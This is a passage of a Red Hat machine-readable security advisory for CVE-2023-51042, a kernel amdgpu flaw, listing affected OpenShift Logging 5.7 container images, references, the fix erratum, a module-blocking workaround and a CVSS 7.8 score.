"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-51042"
},
{
"category": "external",
"summary": "RHBZ#2259866",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259866"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-51042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51042"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-51042",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51042"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628",
"url": "https://github.com/torvalds/linux/commit/2e54154b9f27262efd0cb4f903cc7d5ad1fe9628"
}
],
"release_date": "2024-01-23T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent the amdgpu module from loading. Please see https://access.redhat.com/solutions/41278 for more information on how to prevent kernel modules from loading. Note that if a system has an AMD GPU, this may make certain features of that GPU unavailable.",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
